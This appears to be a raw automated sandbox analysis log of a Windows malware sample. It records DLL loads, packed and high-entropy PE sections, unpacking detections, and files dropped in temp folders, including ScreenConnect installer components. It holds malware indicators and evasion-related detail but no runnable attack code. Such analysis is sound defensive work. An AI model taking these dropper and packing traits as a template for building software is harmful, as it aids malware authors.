Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msihnd.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: tmp29F0.tmp.9.dr

LNK file: ..\..\..\..\..\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: Ryay9q4aDy.exe

Static file information: File size 2126848 > 1048576

Source: Ryay9q4aDy.exe

Static PE information: Raw size of duovosop is bigger than: 0x100000 < 0x19b400

Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: 5bzo1pz.exe, 0000000E.00000002.4567373978.0000000005810000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe.7.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: 5bzo1pz.exe, 0000000E.00000002.4559627989.0000000004D27000.00000004.00000800.00020000.00000000.sdmp, setup.msi.14.dr, 5bzo1pz.exe.7.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: 5bzo1pz.exe, 0000000E.00000002.4559627989.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000000EFC000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe, 0000000E.00000002.4559627989.0000000004D20000.00000004.00000800.00020000.00000000.sdmp, MSI6AD3.tmp.15.dr, setup.msi.14.dr, 5bzo1pz.exe.7.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: 5bzo1pz.exe, 0000000E.00000000.4542234511.0000000000B3D000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe.7.dr, 5bzo1pz[1].exe.7.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Unpacked PE file: 0.2.Ryay9q4aDy.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;duovosop:EW;szrcqhko:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;duovosop:EW;szrcqhko:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.5e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;duovosop:EW;szrcqhko:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;duovosop:EW;szrcqhko:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.5e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;duovosop:EW;szrcqhko:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;duovosop:EW;szrcqhko:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Unpacked PE file: 9.2.loqVSeJ.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;efrqcofg:EW;yqrfybbc:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Unpacked PE file: 11.2.7fOMOTQ.exe.d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rufmbtlx:EW;krhndclf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rufmbtlx:EW;krhndclf:EW;.taggant:EW;

.NET source code contains potential unpacker

Source: 14.0.5bzo1pz.exe.10296dc.1.raw.unpack, Program.cs

.Net Code: Main System.Reflection.Assembly.Load(byte[])

Source: loqVSeJ[1].exe.7.dr

Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: Ryay9q4aDy.exe	Static PE information: real checksum: 0x2152fb should be: 0x20ed99
Source: 5bzo1pz[1].exe.7.dr	Static PE information: real checksum: 0x4fcd9a should be: 0x52652f
Source: 7fOMOTQ.exe.7.dr	Static PE information: real checksum: 0x1fd7da should be: 0x203e52
Source: loqVSeJ.exe.7.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: tmp2A3C.tmp.9.dr	Static PE information: real checksum: 0x2152fb should be: 0x20ed99
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2152fb should be: 0x20ed99
Source: 5bzo1pz.exe.7.dr	Static PE information: real checksum: 0x4fcd9a should be: 0x52652f
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: real checksum: 0x1fd7da should be: 0x203e52
Source: loqVSeJ[1].exe.7.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc

Source: Ryay9q4aDy.exe	Static PE information: section name:
Source: Ryay9q4aDy.exe	Static PE information: section name: .idata
Source: Ryay9q4aDy.exe	Static PE information: section name:
Source: Ryay9q4aDy.exe	Static PE information: section name: duovosop
Source: Ryay9q4aDy.exe	Static PE information: section name: szrcqhko
Source: Ryay9q4aDy.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: duovosop
Source: skotes.exe.0.dr	Static PE information: section name: szrcqhko
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: .idata
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: rufmbtlx
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: krhndclf
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: .taggant
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: .idata
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: rufmbtlx
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: krhndclf
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: .taggant
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name:
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name: .idata
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name:
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name: efrqcofg
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name: yqrfybbc
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name: .taggant
Source: loqVSeJ.exe.7.dr	Static PE information: section name:
Source: loqVSeJ.exe.7.dr	Static PE information: section name: .idata
Source: loqVSeJ.exe.7.dr	Static PE information: section name:
Source: loqVSeJ.exe.7.dr	Static PE information: section name: efrqcofg
Source: loqVSeJ.exe.7.dr	Static PE information: section name: yqrfybbc
Source: loqVSeJ.exe.7.dr	Static PE information: section name: .taggant
Source: tmp2A3C.tmp.9.dr	Static PE information: section name:
Source: tmp2A3C.tmp.9.dr	Static PE information: section name: .idata
Source: tmp2A3C.tmp.9.dr	Static PE information: section name:
Source: tmp2A3C.tmp.9.dr	Static PE information: section name: duovosop
Source: tmp2A3C.tmp.9.dr	Static PE information: section name: szrcqhko
Source: tmp2A3C.tmp.9.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_01360D35 pushad ; iretd	11_3_01360D3D
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_01360D35 pushad ; iretd	11_3_01360D3D
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_01360D35 pushad ; iretd	11_3_01360D3D
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012EB800 pushad ; iretd	11_3_012EB801
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012EB800 pushad ; iretd	11_3_012EB801
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012EC210 pushad ; iretd	11_3_012EC211
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012EC210 pushad ; iretd	11_3_012EC211
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB68 push 68012ECBh; retf	11_3_012ECB6D
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB68 push 68012ECBh; retf	11_3_012ECB6D
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB64 pushad ; retf	11_3_012ECB65
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB64 pushad ; retf	11_3_012ECB65
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB60 pushad ; retf	11_3_012ECB61
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB60 pushad ; retf	11_3_012ECB61
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB54 push eax; retf	11_3_012ECB55
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB54 push eax; retf	11_3_012ECB55
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012EBD50 push esp; ret	11_3_012EBDA9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012EBD50 push esp; ret	11_3_012EBDA9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB50 push eax; retf	11_3_012ECB51
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB50 push eax; retf	11_3_012ECB51
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012F69A5 pushad ; iretd	11_3_012F69AD
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012F69A5 pushad ; iretd	11_3_012F69AD
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012F46C5 pushad ; iretd	11_3_012F46CD
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012F46C5 pushad ; iretd	11_3_012F46CD
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_01360D35 pushad ; iretd	11_3_01360D3D
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_01360D35 pushad ; iretd	11_3_01360D3D
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_01360D35 pushad ; iretd	11_3_01360D3D
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012EB800 pushad ; iretd	11_3_012EB801
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012EB800 pushad ; iretd	11_3_012EB801
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012EC210 pushad ; iretd	11_3_012EC211
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012EC210 pushad ; iretd	11_3_012EC211
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_012ECB68 push 68012ECBh; retf	11_3_012ECB6D

Source: Ryay9q4aDy.exe	Static PE information: section name: entropy: 7.090221110287345
Source: Ryay9q4aDy.exe	Static PE information: section name: duovosop entropy: 7.954384908847522
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.090221110287345
Source: skotes.exe.0.dr	Static PE information: section name: duovosop entropy: 7.954384908847522
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: entropy: 7.176601397129594
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: rufmbtlx entropy: 7.95440713647379
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: entropy: 7.176601397129594
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: rufmbtlx entropy: 7.95440713647379
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name: entropy: 7.966652808119376
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: loqVSeJ.exe.7.dr	Static PE information: section name: entropy: 7.966652808119376
Source: loqVSeJ.exe.7.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: tmp2A3C.tmp.9.dr	Static PE information: section name: entropy: 7.090221110287345
Source: tmp2A3C.tmp.9.dr	Static PE information: section name: duovosop entropy: 7.954384908847522

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\5bzo1pz[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File created: C:\Users\user\AppData\Local\Temp\tmp2A3C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Jump to dropped file
